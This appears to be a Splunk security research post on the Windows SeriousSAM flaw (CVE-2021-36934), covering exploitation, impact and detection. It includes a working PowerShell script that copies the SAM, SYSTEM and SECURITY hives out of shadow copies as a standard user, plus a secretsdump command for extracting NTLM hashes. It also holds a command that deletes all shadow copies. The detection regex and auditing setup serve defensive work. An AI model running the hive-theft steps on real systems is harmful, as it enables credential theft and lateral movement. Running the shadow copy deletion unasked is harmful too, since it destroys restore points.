SeriousSAM, or CVE-2021-36934, is a local privilege escalation vulnerability caused by overly permissive Access Control Lists (ACLs) on several privileged system files, including the Security Accounts Manager (SAM) database: the BUILTIN\Users group is granted read access to them. The SAM database stores the password hashes of the local accounts on a Windows system; the hive itself is encrypted with a key derived from the SYSTEM hive, which the same ACL problem exposes alongside the SECURITY hive. According to the Microsoft advisory, this issue affects Windows 10 1809 and above as well as certain versions of Server 2019.
Exploitation of SeriousSAM
To abuse this misconfiguration, an attacker who has already obtained low-privilege code execution on a vulnerable host needs only to read the hive files (SAM, SYSTEM and SECURITY) out of a Volume Shadow Copy and export them. The live files under %windir%\System32\config cannot be opened directly because the kernel holds them open exclusively, so the attack requires at least one shadow copy to exist on the host; this is commonly the case on workstations with System Protection enabled, since Windows creates restore points before updates and driver installations. An example is shown below using PowerShell:
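The following PowerShell is an added example written for this page, not code from the original post or from any of the published PoCs. It first checks the live ACL on the SAM hive for the vulnerable ACE, then probes the shadow copy device names (the same `\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopyN` paths the public PoCs use, since enumerating shadow copies with vssadmin requires administrator rights) and copies each hive it can read. The output directory name and the probe range of 20 are assumptions; it runs as a standard user on a host that has at least one shadow copy.

```powershell
# Added example (not from the original post): check for the SeriousSAM ACL and,
# if a shadow copy is readable, copy the hives out of it as a standard user.
# Assumptions: $OutDir is a hypothetical writable directory; at most 20 shadow
# copies are probed; .NET 4.6.2+ (present on Windows 10 1809+) so that
# [System.IO.File] accepts \\?\ device paths.
$OutDir = Join-Path $env:TEMP 'hives'
$Hives  = 'SAM', 'SYSTEM', 'SECURITY'

# 1. Vulnerability check on the live file: an affected build shows an inherited
#    Allow ACE for BUILTIN\Users with read access (icacls prints "BUILTIN\Users:(I)(RX)").
$acl = Get-Acl -LiteralPath "$env:windir\System32\config\SAM"
$readData = [int][System.Security.AccessControl.FileSystemRights]::ReadData
$usersRead = $acl.Access | Where-Object {
    $_.IdentityReference.Value -eq 'BUILTIN\Users' -and
    $_.AccessControlType -eq 'Allow' -and
    (([int]$_.FileSystemRights) -band $readData) -ne 0
}
if ($usersRead) {
    Write-Host 'Live SAM ACL grants BUILTIN\Users read access: host is vulnerable.'
} else {
    # A corrected live ACL does not fix snapshots taken earlier, so keep probing:
    # an old shadow copy can still carry the vulnerable security descriptor.
    Write-Host 'Live SAM ACL looks fixed; checking existing shadow copies anyway.'
}

# 2. The live hives are locked by the kernel, so the read goes through a shadow
#    copy. Shadow copies are numbered sequentially, so probe the device names
#    directly instead of calling vssadmin (which needs admin rights).
New-Item -ItemType Directory -Path $OutDir -Force | Out-Null
for ($i = 1; $i -le 20; $i++) {
    $root = "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy$i"
    foreach ($h in $Hives) {
        $src = "$root\Windows\System32\config\$h"
        $dst = Join-Path $OutDir "$h.vsc$i"
        try {
            [System.IO.File]::Copy($src, $dst, $true)
            Write-Host "Copied $src -> $dst"
        } catch {
            # No such shadow copy, or this snapshot already has a fixed ACL: move on.
        }
    }
}
Get-ChildItem -Path $OutDir
```

Each hive is saved with the shadow copy number as a suffix so that a snapshot taken after a mitigation can be compared with an older, still-vulnerable one; the three files from the same snapshot are what an offline hash extraction tool needs.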
Proofs of concept written in C (by security researcher Kevin Beaumont) and re-implemented in Go (by Christian Mehlmauer) are publicly available.
The Impact of SeriousSAM
Using the recovered hives, an attacker can extract the list of local users and their NTLM hashes with an offline tool such as Impacket's secretsdump.py (for example `secretsdump.py -sam SAM -system SYSTEM -security SECURITY LOCAL`); the SYSTEM hive is needed because it holds the boot key that decrypts the SAM. These hashes can be cracked offline using tools like hashcat to obtain the plaintext passwords, or used as they are to authenticate to other hosts over the network with pass-the-hash.
In the most limited scenario, exploitation allows a low-privileged user to escalate privileges on the vulnerable host and take control of it, for instance by using the hash of an enabled local administrator account. This lets attackers install programs; read, modify, or delete sensitive data; add or remove users; and so on.
However, organizations that reuse the same local account with the same credentials across several endpoints in an enterprise network face a higher risk. Using the cracked passwords or the hashes themselves, attackers will be able to authenticate to those remote hosts over the network and obtain remote code execution on them; unique per-host local administrator passwords (as managed by LAPS) contain this lateral movement.
SeriousSAM has been categorized as Important by Microsoft and is pending a CVSS score from NIST at the time of writing. It is certainly not as serious as other vulnerabilities reported in the last few months like PrintNightmare or ProxyLogon. However, under the circumstances described above, it could enable adversaries to achieve operational success faster during a breach. The Splunk Threat Research team recommends performing an assessment to better understand the impact of this vulnerability in corporate environments.
Detection Opportunities and Limitations
Given that successful exploitation of this flaw amounts to nothing more than reading files from a Volume Shadow Copy, the options for detecting it are limited.
Command Line Logging
Native process command-line logging (Event ID 4688 with "Include command line in process creation events" enabled, or Sysmon Event ID 1), PowerShell script block logging (Event ID 4104) and EDR telemetry can all be used to hunt for suspicious paths referencing Volume Shadow Copies (`\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopyN\Windows\System32\config\...`), like the one in the PowerShell example above.
However, these detections are easily bypassed by custom tools that take no telling command-line parameters and read the files through direct API calls, leaving nothing in the command line to match on.
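As an added example (not from the original post), the following PowerShell applies the command-line hunt described above to a handful of constructed log lines and then shows the same check against live 4688 and 4104 events. The sample lines are made up for this page; the property indexes used for the CommandLine field of 4688 (index 8) and the ScriptBlockText field of 4104 (index 2) are those of the current Windows event schema and are assumptions to verify in your own environment.

```powershell
# Added example (not from the original post): hunt process-creation and script
# block telemetry for hive reads through a Volume Shadow Copy. The signature is
# a HarddiskVolumeShadowCopy device path that ends in one of the three hives.
$Pattern = '(?i)HarddiskVolumeShadowCopy\d+\\Windows\\System32\\config\\(SAM|SYSTEM|SECURITY)\b'

function Test-ShadowCopyHiveRead {
    param([Parameter(ValueFromPipeline)][string]$Text)
    process {
        if ($Text -match $Pattern) {
            [pscustomobject]@{ Hive = $Matches[1].ToUpper(); Text = $Text }
        }
    }
}

# Constructed sample lines (not real telemetry) standing in for the CommandLine
# or ScriptBlockText field. The last two are benign shadow copy activity that
# must not match: listing snapshots and copying a user profile out of one.
$Samples = @(
    'powershell.exe -c [IO.File]::Copy(''\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM'',''C:\Users\Public\SAM'')',
    'cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy3\Windows\System32\config\SYSTEM %TEMP%\sys',
    'vssadmin.exe list shadows',
    'robocopy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Users\alice C:\backup'
)
$Samples | Test-ShadowCopyHiveRead | Format-Table -AutoSize
# Expected: two hits (SAM from the first line, SYSTEM from the second), no hits
# for the vssadmin and robocopy lines.

# The same test over live telemetry (reading the Security log needs admin
# rights). 4688 carries the command line only when "Include command line in
# process creation events" is enabled; 4104 requires Script Block Logging.
# Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4688 } |
#     ForEach-Object { $_.Properties[8].Value } | Test-ShadowCopyHiveRead
# Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } |
#     ForEach-Object { $_.Properties[2].Value } | Test-ShadowCopyHiveRead
```

The regex deliberately keys on the combination of a shadow copy device path and a hive file name rather than on `HarddiskVolumeShadowCopy` alone, because backup software and legitimate restores read from shadow copies routinely. It catches none of the compiled PoCs, which pass no such string on their command line; that gap is exactly the limitation noted above and is what file system auditing is for.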
File System Auditing
Native file system auditing in Windows can be used to monitor user attempts to access objects like files and folders. This requires administrators to place a System Access Control List (SACL) on the specific files or folders to be monitored and to enable success auditing for the Object Access > File System subcategory; matching accesses are then recorded as Event ID 4663 in the Security log. Under the right conditions, this is an effective way of detecting attempts to read the SAM database.
However, using SACLs to detect this attack also has some limitations. Based on our testing, a newly created SACL applies only to Volume Shadow Copies taken after it is set. Existing Volume Shadow Copies keep their old security descriptor and will not be monitored, unfortunately. This forces detection teams to delete all previous VSCs (and with them the restore points they provide) in order to monitor for CVE-2021-36934 exploitation using this approach.
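The following PowerShell is an added example written for this page, not part of the original post. It sets up the SACL-based detection just described end to end: it enables the audit subcategory, adds a success audit rule for reads of the three hives, deletes the existing shadow copies that the new SACL cannot reach, and then queries the resulting 4663 events. It assumes an elevated PowerShell session (writing a SACL needs SeSecurityPrivilege), and the 4663 property indexes it uses (SubjectUserName 1, ObjectName 6, ProcessName 11) are those of the current event schema and should be confirmed against your own events.

```powershell
# Added example (not from the original post): audit reads of the hive files with
# a SACL, handle the existing-snapshot blind spot, and hunt the 4663 events.
# Assumptions: elevated session; auditpol and vssadmin available as on a stock
# Windows 10 / Server 2019 host.
$ConfigDir = "$env:windir\System32\config"
$Hives     = 'SAM', 'SYSTEM', 'SECURITY'

# 1. Audit policy: without Object Access > File System success auditing the
#    SACL is evaluated but no 4663 event is ever written.
auditpol /set /subcategory:"File System" /success:enable | Out-Null

# 2. SACL on each hive: audit successful ReadData by Everyone. The -Audit switch
#    is required on Get-Acl, otherwise Set-Acl would write back an empty SACL.
foreach ($h in $Hives) {
    $path = Join-Path $ConfigDir $h
    $acl  = Get-Acl -LiteralPath $path -Audit
    $rule = New-Object System.Security.AccessControl.FileSystemAuditRule(
        'Everyone',
        [System.Security.AccessControl.FileSystemRights]::ReadData,
        [System.Security.AccessControl.AuditFlags]::Success)
    $acl.AddAuditRule($rule)
    Set-Acl -LiteralPath $path -AclObject $acl
}

# 3. Only snapshots taken from now on carry the SACL. Existing shadow copies
#    keep the old security descriptor (and the vulnerable DACL), so remove them.
#    This also discards the restore points they back, so schedule it deliberately.
#    Microsoft's published workaround does the same and additionally restores the
#    DACL with: icacls %windir%\system32\config\*.* /inheritance:e
vssadmin delete shadows "/for=$env:SystemDrive" /all /quiet

# 4. Hunt: a read from a shadow copy is logged with the snapshot's device path as
#    ObjectName, so match on the trailing hive path rather than on a drive letter.
Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4663 } -ErrorAction SilentlyContinue |
    Where-Object { $_.Properties[6].Value -match '(?i)\\System32\\config\\(SAM|SYSTEM|SECURITY)$' } |
    Select-Object TimeCreated,
        @{ n = 'User';    e = { $_.Properties[1].Value } },
        @{ n = 'Object';  e = { $_.Properties[6].Value } },
        @{ n = 'Process'; e = { $_.Properties[11].Value } }
```

Expect a steady trickle of 4663 events from lsass.exe and from backup agents, which legitimately read the hives; a read of any hive by a process running as an ordinary interactive user, or from a path under `\Device\HarddiskVolumeShadowCopyN`, is the signal to act on.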
The following analytics already in Splunk Security Content relate to Shadow Copies being modified or deleted. In addition, we wrote two new detections specifically for CVE-2021-36934:
Detect Copy of ShadowCopy with Script Block Logging
SAM Database File Access Attempt